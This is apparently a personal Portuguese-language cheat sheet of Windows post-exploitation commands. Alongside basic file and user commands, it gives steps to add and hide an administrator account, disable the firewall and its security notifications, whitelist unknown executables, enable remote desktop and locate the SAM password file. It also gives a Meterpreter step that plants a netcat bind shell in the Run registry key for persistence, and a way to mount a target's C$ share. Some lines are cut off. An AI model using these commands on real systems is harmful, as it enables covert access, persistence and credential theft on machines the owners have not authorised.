----------------------------------------------
		COMANDOS BASICOS WINDOWS
----------------------------------------------

-Mostrar conteudo uma pagina | more
	more [file]

- Procurar string em um arquivo
	type [file] | find /i "[string]"
	type [file] | findstr [regex]

- Veriricar variaveis do sistema
	set
	set [variable_name]

- Procurar arquivo no sistema
	dir /b /s [diretorio]\[file]
	dir /b /s %systemroot%\[file]

----------------------------------------------
		MANUSEAR USUARIOS
----------------------------------------------

- net user - listar  usuarios
- net localgroup - listar grupos
- net localgroup administrators - listar administradores
- net user [logon_name] [password] /add - adicionar usuario
- net localgroup administrators [logon_name] /add - adicionar usuario ao grupo admin
- net user Administrator 123456 - trocar senha do usuario administrador
- net user [logon_name] /del - deletar usuario

----------------------------------------------
		MANIPULANDO O FIREWALL
----------------------------------------------

- Verificar status do firewall
	netsh advfirewall show allprofiles

- Autorizar porta regra especifica
	netsh advfirewall firewall add rule name="[rule_name]" dir=in action=allow remoteip=[yourIpAddress] protocol=TCP localport=[port]

- Deletar regra
	netsh advfirewall firewall del rule name="[rule_name"

- Desabilitar o Firewall do Windows
	netsh advfirewall set allprofiles state off

- Habilitar programa no firewall
	netsh firewall set allowedprogram program = c:\windows\system32\win32b.exe name = win32b mode = ENABLE scope = ALL
	netsh firewall set allowedprogram program = c:\windows\system32\win32b1.exe name = win32b1 mode = ENABLE scope = ALL
	netsh firewall set allowedprogram program = c:\windows\system32\win32r.exe name = win32r mode = ENABLE scope = ALL

----------------------------------------------
		MANIPULANDO CHAVES DE REGISTRO
----------------------------------------------

- Alterar uma chave de registro
	reg add [KeyName] /v [ValueName] /t [type] /d [data]

- Exportar configuracoes para chave de registro
	reg export [KeyNote] [filename.reg]

- Importar configuracoes de chave de registro
	reg import [filename.reg]

- Ativar o Rdesktop
	reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t Reg_DWord /d 0

- Ocultar usuario adicionado na tela de login
	reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v [nome do usuario] /t Reg_DWord /d 0

- Desabilitar alerta de seguranca
	reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v HighRiskFileTypes /t Reg_SZ /d
	reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v LowRiskFileTypes /t Reg_SZ /d "win32b.exe;win32b1.exe;$

- Habilitar servico de compartilhamento de arquivo
	reg add  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"  /v forceguest /t REG_DWORD /d 0

- Desativar notificacao de firewal desativado
	reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center" /v FirewallDisableNotify /t Reg_DWord /d 1

- Desativar firewall - windows xp

	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t Reg_DWord $

	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DoNotAllowExceptions /t Reg_$


-----------------------------------------------
		Arquivo de senhas do Windows XP
-----------------------------------------------
c:\windows\system32\config\sam

c:\windows\repair\sam

-----------------------------------------------
		Mudar registro para executar comando
		sempre que iniciar a maquina
-----------------------------------------------

- Lista as entradas do registro

	meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

- Adiciona nova entrada do registro

	meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
	meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc


-----------------------------------------------
		CONEXOES SAMBA
-----------------------------------------------

- Montar uma particao compartilhada
	net use * \\[targetIP]\[share_dict] /u:[user]
	net use * \\10.10.10.20\C$ password /u:susan

